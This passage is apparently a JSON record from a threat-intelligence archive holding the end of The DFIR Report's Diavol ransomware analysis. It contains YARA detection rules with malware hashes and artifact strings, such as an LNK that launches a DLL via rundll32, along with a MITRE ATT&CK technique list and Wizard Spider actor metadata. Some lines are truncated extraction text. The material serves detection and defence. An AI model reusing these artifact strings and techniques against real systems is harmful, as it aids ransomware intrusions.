filesize \u003c 2000KB and\r\n ( pe.imphash() == \"c270086ea8ef591ab09b6ccf85dc6072\" and pe.exports(\"BasicScore\") or 8 of them )\r\n}\r\nrule new_documents_2005_iso {\r\n meta:\r\n description = \"8099 - file new-documents-2005.iso\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2021-11-29\"\r\n hash1 = \"1de1336e311ba4ab44828420b4f876d173634670c0b240c6cca5babb1d8b0723\"\r\n strings:\r\n $x1 = \"SharedFiles.dll,BasicScore\\\"%systemroot%\\\\system32\\\\imageres.dll\" fullword wide\r\n $s2 = \"C:\\\\Windows\\\\System32\\\\rundll32.exe\" fullword ascii\r\n $s3 = \"SHAREDFI.DLL\" fullword ascii\r\n $s4 = \"SharedFiles.dll\" fullword wide\r\n $s5 = \"C:\\\\Users\\\\User\\\\Documents\" fullword wide\r\n $s6 = 
\"DragListCtrl.dll\" fullword ascii\r\n $s7 = \"MyLinks.dll\" fullword wide\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 35 of 38\n\n$s8 = \"ButtonSkin.dll\" fullword wide\r\n $s9 = \"whoami.exe\" fullword ascii\r\n $s10 = \" ..\\\\Windows\\\\System32\\\\rundll32.exe\" fullword wide\r\n $s11 = \"User (C:\\\\Users)\" fullword wide\r\n $s12 = \" \" fullword ascii\r\n $s13 = \"DOCUMENT.LNK\" fullword ascii\r\n $s14 = \"Documents.lnk@\" fullword wide\r\n $s15 = \",System32\" fullword wide\r\n $s16 = \" Type Descriptor'\" fullword ascii\r\n $s17 = \" constructor or from DllMain.\" fullword ascii\r\n $s18 = \" \" fullword ascii\r\n $s19 = \"DINGXXPADDINGPADDINGXXPADDINGPADD\" fullword ascii\r\n $s20 = \" Class Hierarchy Descriptor'\" fullword ascii\r\n condition:\r\n uint16(0) == 0x0000 and filesize \u003c 2000KB and\r\n 1 of ($x*) and 4 of them\r\n}\r\nrule files_tmp {\r\n meta:\r\n description = \"8099 - file tmp.dll\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2021-12-12\"\r\n hash1 = \"493a1fbe833c419b37bb345f6f193517d5d9fd2577f09cc74b48b49d7d732a54\"\r\n strings:\r\n $s1 = \"UncategorizedOtherOutOfMemoryUnexpectedEofInterruptedArgumentListTooLongFilenameTooLongTooManyLinks\r\n $s2 = \"uncategorized errorother errorout of memoryunexpected end of fileunsupportedoperation interruptedar\r\n $s3 = \"kuiiqaiusmlytqxxnrtl.dll\" fullword ascii\r\n $s4 = \"Node.js API crypto.randomFillSync is unavailableNode.js crypto module is unavailablerandSecure: VxW\r\n $s5 = \"ctoryoperation would blockentity already existsbroken pipenetwork downaddress not availableaddress\r\n $s6 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n $s7 = \"keyed events not availableC:rtzkoqhrehbskobagkzngetniywbivatkcfmkxxumjxevfohiuxtzrkjoopvcwassaovngx\r\n $s8 = \"keyed events not availableC:rtzkoqhrehbskobagkzngetniywbivatkcfmkxxumjxevfohiuxtzrkjoopvcwassaovngx\r\n $s9 = \"attempted to index slice from after maximum 
usizeattempted to index slice up to maximum usizeassert\r\n $s10 = \"attempted to zero-initialize type `alloc::string::String`, which is invalidassertion failed: 0 \u003c p\r\n $s11 = \"attempted to zero-initialize type `\u0026str`, which is invalidassertion failed: 0 \u003c pointee_size \u0026\u0026 po\r\n $s12 = \"attempted to zero-initialize type `\u0026str`, which is invalidassertion failed: 0 \u003c pointee_size \u0026\u0026 po\r\n $s13 = \"rno: did not return a positive valuegetrandom: this target is not supportedC:ehpgbcedommleqfhulhfn\r\n $s14 = \"attempted to zero-initialize type `(*mut u8, unsafe extern \\\"C\\\" fn(*mut u8))`, which is invalidas\r\n $s15 = \"attempted to index slice from after maximum usizeattempted to index slice up to maximum usizeasser\r\n $s16 = \"attempted to zero-initialize type `alloc::string::String`, which is invalidassertion failed: 0 \u003c p\r\n $s17 = \"workFileHandleFilesystemLoopReadOnlyFilesystemDirectoryNotEmptyIsADirectoryNotADirectoryWouldBlock\r\n $s18 = \"abortednetwork unreachablehost unreachableconnection resetconnection refusedpermission deniedentit\r\n $s19 = \"thread panicked while processing panic. 
aborting.\" fullword ascii\r\n $s20 = \"internal_codedescription0\" fullword ascii\r\n condition:\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 36 of 38\n\nuint16(0) == 0x5a4d and filesize \u003c 5000KB and\r\n ( pe.imphash() == \"59e16a2afa5b682bb9692bac873fa10c\" and ( pe.exports(\"EnterDll\") and pe.exports(\"alpjxrie\r\n}\r\nrule Documents {\r\n meta:\r\n description = \"8099 - file Documents.lnk\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2021-12-12\"\r\n hash1 = \"e87f9f378590b95de1b1ef2aaab84e1d00f210fd6aaf5025d815f33096c9d162\"\r\n strings:\r\n $x1 = \"SharedFiles.dll,BasicScore\\\"%systemroot%\\\\system32\\\\imageres.dll\" fullword wide\r\n $x2 = \"C:\\\\Windows\\\\System32\\\\rundll32.exe\" fullword ascii\r\n $s3 = \"C:\\\\Users\\\\User\\\\Documents\" fullword wide\r\n $s4 = \" ..\\\\Windows\\\\System32\\\\rundll32.exe\" fullword wide\r\n $s5 = \"User (C:\\\\Users)\" fullword wide\r\n $s6 = \",System32\" fullword wide\r\n $s7 = \"Documents\" fullword wide /* Goodware String - occured 89 times */\r\n $s8 = \"windev2106eval\" fullword ascii\r\n $s9 = \"%Windows\" fullword wide /* Goodware String - occured 2 times */\r\n $s10 = \"OwHUSx\" fullword ascii\r\n $s11 = \"System Folder\" fullword wide /* Goodware String - occured 5 times */\r\n condition:\r\n uint16(0) == 0x004c and filesize \u003c 3KB and\r\n 1 of ($x*) and all of them\r\n}\r\nMITRE\r\nSpearphising Link – T1566.002\r\nBITS Jobs – T1197\r\nKerberoasting – T1558.003\r\nAS-REP Roasting – T1558.004\r\nCredentials in Registry – T1552.002\r\nRemote Desktop Protocol – T1021.001\r\nExfiltration to Cloud Storage – T1567.002\r\nOS Credential Dumping – T1003\r\nSMB/Windows Admin Shares – T1021.002\r\nSystem Owner/User Discovery – T1033\r\nNetwork Service Scanning – T1046\r\nProcess Injection – T1055\r\nPowerShell – T1059.001\r\nDomain Groups – T1069.002\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 37 of 38\n\nFile 
and Directory Discovery – T1083\r\nAccess Token Manipulation – T1134\r\nNetwork Share Discovery – T1135\r\nDomain Trust Discovery – T1482\r\nData Encrypted for Impact – T1486\r\nDisable or Modify Tools – T1562.001\r\nValid Accounts – T1078\r\nInternal case #8099\r\nSource: https://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\r\nPage 38 of 38\n\n  https://thedfirreport.com/2021/12/13/diavol-ransomware/ \nComparing compiled version to executable from this intrusion\nBefore execution of AdFind.exe, adf.bat was run. \n   Page 19 of 38",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2021/12/13/diavol-ransomware/"
	],
	"report_names": [
		"diavol-ransomware"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f6f91e1c-9202-4497-bf22-9cd5ef477600",
			"created_at": "2023-01-06T13:46:38.86765Z",
			"updated_at": "2026-04-10T02:00:03.12735Z",
			"deleted_at": null,
			"main_name": "WIZARD SPIDER",
			"aliases": [
				"TEMP.MixMaster",
				"GOLD BLACKBURN",
				"DEV-0193",
				"UNC2053",
				"Pistachio Tempest",
				"DEV-0237",
				"Storm-0230",
				"FIN12",
				"Periwinkle Tempest",
				"Storm-0193",
				"Trickbot LLC"
			],
			"source_name": "MISPGALAXY:WIZARD SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bc119938-a79c-4e5f-9d4d-dc96835dfe2e",
			"created_at": "2024-06-04T02:03:07.799286Z",
			"updated_at": "2026-04-10T02:00:03.606456Z",
			"deleted_at": null,
			"main_name": "GOLD BLACKBURN",
			"aliases": [
				"ITG23 ",
				"Periwinkle Tempest ",
				"Wizard Spider "
			],
			"source_name": "Secureworks:GOLD BLACKBURN",
			"tools": [
				"BazarLoader",
				"Buer Loader",
				"Bumblebee",
				"Dyre",
				"Team9",
				"TrickBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "63061658-5810-4f01-9620-7eada7e9ae2e",
			"created_at": "2022-10-25T15:50:23.752974Z",
			"updated_at": "2026-04-10T02:00:05.244531Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"Wizard Spider",
				"UNC1878",
				"TEMP.MixMaster",
				"Grim Spider",
				"FIN12",
				"GOLD BLACKBURN",
				"ITG23",
				"Periwinkle Tempest",
				"DEV-0193"
			],
			"source_name": "MITRE:Wizard Spider",
			"tools": [
				"TrickBot",
				"AdFind",
				"BITSAdmin",
				"Bazar",
				"LaZagne",
				"Nltest",
				"GrimAgent",
				"Dyre",
				"Ryuk",
				"Conti",
				"Emotet",
				"Rubeus",
				"Mimikatz",
				"Diavol",
				"PsExec",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3",
			"created_at": "2022-10-25T16:07:24.422115Z",
			"updated_at": "2026-04-10T02:00:04.983298Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"DEV-0193",
				"G0102",
				"Gold Blackburn",
				"Gold Ulrick",
				"Grim Spider",
				"ITG23",
				"Operation BazaFlix",
				"Periwinkle Tempest",
				"Storm-0230",
				"TEMP.MixMaster",
				"Wizard Spider"
			],
			"source_name": "ETDA:Wizard Spider",
			"tools": [
				"AdFind",
				"Agentemis",
				"Anchor_DNS",
				"BEERBOT",
				"BazarBackdoor",
				"BazarCall",
				"BazarLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"Conti",
				"Diavol",
				"Dyranges",
				"Dyre",
				"Dyreza",
				"Dyzap",
				"Gophe",
				"Invoke-SMBAutoBrute",
				"KEGTAP",
				"LaZagne",
				"LightBot",
				"PowerSploit",
				"PowerTrick",
				"PsExec",
				"Ryuk",
				"SessionGopher",
				"TSPY_TRICKLOAD",
				"Team9Backdoor",
				"The Trick",
				"TheTrick",
				"Totbrick",
				"TrickBot",
				"TrickLoader",
				"TrickMo",
				"Upatre",
				"bazaloader",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434247,
	"ts_updated_at": 1775826683,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3b407c56de2595ffddfc27a8e91ce2ded96d9b18.pdf",
		"text": "https://archive.orkl.eu/3b407c56de2595ffddfc27a8e91ce2ded96d9b18.txt",
		"img": "https://archive.orkl.eu/3b407c56de2595ffddfc27a8e91ce2ded96d9b18.jpg"
	}
}